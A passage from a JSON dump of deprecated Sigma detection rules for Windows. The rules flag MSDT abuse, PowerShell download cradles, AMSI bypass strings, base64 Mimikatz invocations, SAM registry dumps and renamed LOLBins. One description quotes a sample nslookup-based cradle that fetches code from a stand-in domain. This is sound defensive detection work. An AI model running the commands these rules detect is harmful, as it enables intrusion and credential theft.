    "content": "title: Execute MSDT.EXE Using Diagcab File\nid: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3\nstatus: deprecated\ndescription: Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190\nreferences:\n    - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0\n    - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\nauthor: GossiTheDog, frack113\ndate: 2022/06/09\nmodified: 2023/02/06\ntags:\n    - attack.defense_evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    selection_cmd:\n        CommandLine|contains:\n            - ' /cab'\n            - ' -cab'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of \".diagcab\" files\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_new_service_creation.yml",
    "content": "title: New Service Creation\nid: 7fe71fc9-de3b-432a-8d57-8c809efc10ab\nstatus: deprecated\ndescription: Detects creation of a new service.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/21\nmodified: 2023/02/20\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'create'\n            - 'binPath'\n    selection_posh:\n        CommandLine|contains|all:\n            - 'New-Service'\n            - '-BinaryPathName'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administrator or user creates a service for legitimate reasons.\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_nslookup_pwsh_download_cradle.yml",
    "content": "title: Nslookup PwSh Download Cradle\nid: 72671447-4352-4413-bb91-b85569687135\nstatus: deprecated\ndescription: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]\nreferences:\n    - https://twitter.com/alh4zr3d/status/1566489367232651264\nauthor: Zach Mathis (@yamatosecurity)\ndate: 2022/09/06\nmodified: 2022/12/14 # Deprecation date\ntags:\n    - attack.command_and_control\n    - attack.t1105\n    - attack.t1071.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\powershell.exe'\n        Image|contains: nslookup\n        CommandLine|contains: '=txt '\n    condition: selection\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_odbcconf_susp_exec.yml",
    "content": "title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe\nid: 65d2be45-8600-4042-b4c0-577a1ff8a60e\nstatus: deprecated\ndescription: Detects defence evasion attempt via odbcconf.exe execution to load DLL\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca\nauthor: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community\ndate: 2019/10/25\nmodified: 2023/05/22\ntags:\n    - attack.defense_evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_1_cli:\n        CommandLine|contains:\n            - '-a'\n            - '-f'\n            - '/a'\n            - '/f'\n            - 'regsvr'\n    selection_2_parent:\n        ParentImage|endswith: '\\odbcconf.exe'\n    selection_2_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    condition: all of selection_1_* or all of selection_2_*\nfalsepositives:\n    - Legitimate use of odbcconf.exe by legitimate user\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml",
    "content": "title: Excel Proxy Executing Regsvr32 With Payload\nid: 9d1c72f5-43f0-4da5-9320-648cf2099dd0\nstatus: deprecated\ndescription: |\n  Excel called wmic to finally proxy execute regsvr32 with the payload.\n  An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).\n  But we have command-line in the event which allow us to \"restore\" this suspicious parent-child chain and detect it.\n  Monitor process creation with \"wmic process call create\" and LOLBins in command-line with parent Office application processes.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'\ndate: 2021/08/23\nmodified: 2022/12/02\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: add more LOLBins to the rules logic of your choice.\n    selection_img:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_other:\n        CommandLine|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'msiexec'\n            - 'mshta'\n            - 'verclsid'\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n        CommandLine|contains|all:\n            - 'process'\n            - 'create'\n            - 'call'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml",
    "content": "title: Excel Proxy Executing Regsvr32 With Payload Alternate\nid: c0e1c3d5-4381-4f18-8145-2583f06a1fe5\nstatus: deprecated\ndescription: |\n  Excel called wmic to finally proxy execute regsvr32 with the payload.\n  An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).\n  But we have command-line in the event which allow us to \"restore\" this suspicious parent-child chain and detect it.\n  Monitor process creation with \"wmic process call create\" and LOLBins in command-line with parent Office application processes.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: 'Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)'\ndate: 2021/08/23\nmodified: 2022/12/02\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: add more LOLBins to the rules logic of your choice.\n    selection1:\n        CommandLine|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'msiexec'\n            - 'mshta'\n            - 'verclsid'\n    selection2:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - CommandLine|contains: 'wmic '\n    selection3:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n    selection4:\n        CommandLine|contains|all:\n            - 'process'\n            - 'create'\n            - 'call'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_office_spawning_wmi_commandline.yml",
    "content": "title: Office Applications Spawning Wmi Cli Alternate\nid: 04f5363a-6bca-42ff-be70-0d28bf629ead\nstatus: deprecated\ndescription: Initial execution of malicious document calls wmic to execute the file with regsvr32\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)\ndate: 2021/08/23\nmodified: 2023/02/04\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    #useful_information: Add more office applications to the rule logic of choice\n    selection1:\n        - Image|endswith: '\\wbem\\WMIC.exe'\n        - CommandLine|contains: 'wmic '\n    selection2:\n        ParentImage|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\eqnedt32.exe'\n            - '\\visio.exe'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_possible_applocker_bypass.yml",
    "content": "title: Possible Applocker Bypass\nid: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719\nstatus: deprecated\ndescription: Detects execution of executables that can be used to bypass Applocker whitelisting\nreferences:\n    - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt\n    - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md\nauthor: juju4\ndate: 2019/01/16\nmodified: 2022/11/03\ntags:\n    - attack.defense_evasion\n    - attack.t1218.004\n    - attack.t1218.009\n    - attack.t1127.001\n    - attack.t1218.005\n    - attack.t1218   # no way to map 1:1, so the technique level is required\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '\\msdt.exe'\n            - '\\installutil.exe'\n            - '\\regsvcs.exe'\n            - '\\regasm.exe'\n            #- '\\regsvr32.exe'  # too many FPs, very noisy\n            - '\\msbuild.exe'\n            - '\\ieexec.exe'\n            #- '\\mshta.exe'\n            #- '\\csc.exe'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\n    - Using installutil to add features for .NET applications (primarily would occur in developer environments)\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml",
    "content": "title: PowerShell AMSI Bypass Pattern\nid: 4f927692-68b5-4267-871b-073c45f4f6fe\nstatus: deprecated\ndescription: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.\nauthor: '@Kostastsale'\nreferences: \n  - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\ndate: 2022/11/04\nmodified: 2023/02/03\ntags:\n  - attack.defense_evasion\n  - attack.t1562.001\n  - attack.execution\nlogsource:\n  product: windows\n  category: process_creation\ndetection:\n  selection1:\n    Image|endswith: \n      - '\\powershell.exe'\n      - '\\pwsh.exe'\n      - '\\powershell_ise.exe'\n    CommandLine|contains|all:\n      - '[Ref].Assembly.GetType'\n      - 'SetValue($null,$true)'\n      - 'NonPublic,Static'\n  condition: selection1\nfalsepositives:\n  - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml",
    "content": "title: Malicious Base64 Encoded Powershell Invoke Cmdlets\nid: fd6e2919-3936-40c9-99db-0aa922c356f7\nrelated:\n    - id: 6385697e-9f1b-40bd-8817-f4a91f40508e\n      type: similar\nstatus: deprecated\ndescription: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets\nreferences:\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: pH-T (Nextron Systems)\ndate: 2022/05/31\nmodified: 2023/01/30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # Invoke-BloodHound\n            - 'SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA'\n            - 'kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA'\n            - 'JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA'\n            # Invoke-Mimikatz\n            - 'SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA'\n            - 'kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A'\n            - 'JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg'\n            # Invoke-WMIExec\n            - 'SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA'\n            - 'kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw'\n            - 'JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA'\n    condition: selection\nfields:\n    - CommandLine\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml",
    "content": "title: Base64 Encoded Listing of Shadowcopy\nid: 47688f1b-9f51-4656-b013-3cc49a166a36\nstatus: deprecated\ndescription: Detects base64 encoded listing Win32_Shadowcopy\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\nauthor: Christian Burkard (Nextron Systems)\ndate: 2022/03/01\nmodified: 2023/01/30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Win32_Shadowcopy | ForEach-Object\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA'\n            - 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A'\n            - 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA'\n    condition: selection\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_base64_shellcode.yml",
    "content": "title: Potential PowerShell Base64 Encoded Shellcode\nid: 2d117e49-e626-4c7c-bd1f-c3c0147774c8\nstatus: deprecated\ndescription: Detects potential powershell Base64 encoded Shellcode\nreferences:\n    - https://twitter.com/cyb3rops/status/1063072865992523776\nauthor: Florian Roth (Nextron Systems)\ndate: 2018/11/17\nmodified: 2023/04/06\ntags:\n    - attack.defense_evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'OiCAAAAYInlM'\n            - 'OiJAAAAYInlM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_bitsjob.yml",
    "content": "title: Suspicious Bitsadmin Job via PowerShell\nid: f67dbfce-93bc-440d-86ad-a95ae8858c90\nstatus: deprecated\ndescription: Detect download by BITS jobs via PowerShell\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nauthor: Endgame, JHasenbusch (ported to sigma for oscd.community)\ndate: 2018/10/30\nmodified: 2022/11/21\ntags:\n    - attack.defense_evasion\n    - attack.persistence\n    - attack.t1197\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains: 'Start-BitsTransfer'\n    condition: selection\nfields:\n    - ComputerName\n    - User\n    - CommandLine\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_download_cradles.yml",
    "content": "title: PowerShell Web Download\nid: 6e897651-f157-4d8f-aaeb-df8151488385\nstatus: deprecated\ndescription: Detects suspicious ways to download files or content using PowerShell\nreferences:\n    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-24\nmodified: 2025-07-18\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1105\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '.DownloadString('\n            - '.DownloadFile('\n            - 'Invoke-WebRequest '\n            - 'iwr '\n    condition: selection\nfalsepositives:\n    - Scripts or tools that download files\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_service_modification.yml",
    "content": "title: Stop Or Remove Antivirus Service\nid: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b\nstatus: deprecated\ndescription: |\n    Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\n    Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\nauthor: frack113\ndate: 2021/07/07\nmodified: 2023/03/04\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_action:\n        CommandLine|contains:\n            - 'Stop-Service '\n            - 'Remove-Service '\n    selection_product:\n        CommandLine|contains:\n            # Feel free to add more service name\n            - ' McAfeeDLPAgentService'\n            - ' Trend Micro Deep Security Manager'\n            - ' TMBMServer'\n            - 'Sophos'\n            - 'Symantec'\n    condition: all of selection*\nfields:\n    - ComputerName\n    - User\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_susp_ps_downloadfile.yml",
    "content": "title: PowerShell DownloadFile\nid: 8f70ac5f-1f6f-4f8e-b454-db19561216c5\nstatus: deprecated # Deprecated in favor of 3b6ab547-8ec2-4991-b9d2-2b06702a48d7\ndescription: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-08-28\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.command-and-control\n    - attack.t1104\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'powershell'\n            - '.DownloadFile'\n            - 'System.Net.WebClient'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_powershell_xor_encoded_command.yml",
    "content": "title: Potential Xor Encoded PowerShell Command\nid: 5b572dcf-254b-425c-a8c5-d9af6bea35a6\nrelated:\n    - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f\n      type: similar\nstatus: deprecated\ndescription: Detects usage of \"xor\" or \"bxor\" in combination of a \"foreach\" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2022/07/06\nmodified: 2023/01/30\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        - OriginalFileName:\n            - 'PowerShell.exe'\n            - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'ForEach'\n            - 'Xor'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_reg_dump_sam.yml",
    "content": "title: Registry Dump of SAM Creds and Secrets\nid: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e\nrelated:\n    - id: fd877b94-9bb5-4191-bb25-d79cbd93c167\n      type: similar\nstatus: deprecated\ndescription: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets\nauthor: frack113\ndate: 2022/01/05\nmodified: 2023/02/04\ntags:\n    - attack.credential_access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_reg:\n        CommandLine|contains: ' save '\n    selection_key:\n        CommandLine|contains:\n            - HKLM\\sam\n            - HKLM\\system\n            - HKLM\\security\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_regsvr32_anomalies.yml",
    "content": "title: Regsvr32 Anomaly\nid: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d\nstatus: deprecated\ndescription: Detects various anomalies in relation to regsvr32.exe\nreferences:\n    - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), oscd.community, Tim Shelton\ndate: 2019/01/16\nmodified: 2023/05/26\ntags:\n    - attack.defense_evasion\n    - attack.t1218.010\n    - car.2019-04-002\n    - car.2019-04-003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains: '\\Temp\\'\n    selection2:\n        Image|endswith: '\\regsvr32.exe'\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\powershell_ise.exe'\n    selection3:\n        Image|endswith: '\\regsvr32.exe'\n        ParentImage|endswith: '\\cmd.exe'\n    selection4a:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|all:\n            - '/i:'\n            - 'http'\n        CommandLine|endswith: 'scrobj.dll'\n    selection4b:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains|all:\n            - '/i:'\n            - 'ftp'\n        CommandLine|endswith: 'scrobj.dll'\n    selection5:\n        Image|endswith: \n            - '\\cscript.exe'\n            - '\\wscript.exe'\n        ParentImage|endswith: '\\regsvr32.exe'\n    selection6:\n        Image|endswith: '\\EXCEL.EXE'\n        CommandLine|contains: '..\\..\\..\\Windows\\System32\\regsvr32.exe '\n    selection7:\n        ParentImage|endswith: '\\mshta.exe'\n        Image|endswith: '\\regsvr32.exe'\n    selection8:\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|contains:\n            - '\\AppData\\Local'\n            - 'C:\\Users\\Public'\n    selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3\n        Image|endswith: '\\regsvr32.exe'\n        CommandLine|endswith:\n            - '.jpg'\n            - '.jpeg'\n            - '.png'\n            - '.gif'\n            - '.bin'\n            - '.tmp'\n            - '.temp'\n            - '.txt'\n    filter1:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Microsoft\\Teams'\n            - '\\AppData\\Local\\WebEx\\WebEx64\\Meetings\\atucfobj.dll'\n    filter2:\n        ParentImage: 'C:\\Program Files\\Box\\Box\\FS\\streem.exe'\n        CommandLine|contains: '\\Program Files\\Box\\Box\\Temp\\'\n    filter_legitimate:\n        CommandLine|endswith: '/s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll'\n    condition: 1 of selection* and not 1 of filter*\nfields:\n    - CommandLine\n    - ParentCommandLine\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_paexec.yml",
    "content": "title: Renamed PaExec Execution\nid: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b\nstatus: deprecated\ndescription: Detects execution of renamed paexec via imphash and executable product string\nreferences:\n    - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc\n    - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf\nauthor: Jason Lynch\ndate: 2019/04/17\nmodified: 2023/02/14\ntags:\n    - attack.defense_evasion\n    - attack.t1036.003\n    - attack.g0046\n    - car.2013-05-009\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product|contains: 'PAExec'\n        - Hashes|contains:\n            - IMPHASH=11D40A7B7876288F919AB819CC2D9802\n            - IMPHASH=6444f8a34e99b8f7d9647de66aabe516\n            - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f\n            - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c\n    filter:\n        Image|contains: 'paexec'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_powershell.yml",
    "content": "title: Renamed PowerShell\nid: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20\nstatus: deprecated\ndescription: Detects the execution of a renamed PowerShell often used by attackers or malware\nreferences:\n    - https://twitter.com/christophetd/status/1164506034720952320\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2019/08/22\nmodified: 2023/01/18\ntags:\n    - car.2013-05-009\n    - attack.defense_evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Description|startswith:\n            - 'Windows PowerShell'\n            - 'pwsh'\n        Company: 'Microsoft Corporation'\n    filter:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_psexec.yml",
    "content": "title: Renamed PsExec\nid: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2\nstatus: deprecated\ndescription: Detects the execution of a renamed PsExec often used by attackers or malware\nreferences:\n    - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks\nauthor: Florian Roth (Nextron Systems)\ndate: 2019/05/21\nmodified: 2023/03/04\ntags:\n    - car.2013-05-009\n    - attack.defense_evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Description: 'Execute processes remotely'\n        Product: 'Sysinternals PsExec'\n    filter:\n        Image|endswith:\n            - '\\PsExec.exe'\n            - '\\PsExec64.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Software that illegaly integrates PsExec in a renamed form\n    - Administrators that have renamed PsExec and no one knows why\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_renamed_rundll32.yml",
    "content": "title: Renamed Rundll32.exe Execution\nid: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2\nstatus: deprecated\ndescription: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection\nreferences:\n    - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/06/08\nmodified: 2023/01/18\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'RUNDLL32.EXE'\n    filter:\n        Image|endswith: '\\rundll32.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/proc_creation_win_root_certificate_installed.yml",
    "content": "title: Root Certificate Installed\nid: 46591fae-7a4c-46ea-aec3-dff5e6d785dc\nrelated:\n    - id: 42821614-9264-4761-acfc-5772c3286f76\n      type: derived\nstatus: deprecated\ndescription: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nauthor: 'oscd.community, @redcanary, Zach Stanford @svch0st'\ndate: 2020/10/10\nmodified: 2023/03/05\ntags:\n    - attack.defense_evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\certutil.exe'     # Example: certutil -addstore -f -user ROOT CertificateFileName.der\n        CommandLine|contains|all:\n            - '-addstore'\n            - 'root'\n    selection2:\n        Image|endswith: '\\CertMgr.exe'      # Example: CertMgr.exe /add CertificateFileName.cer /s 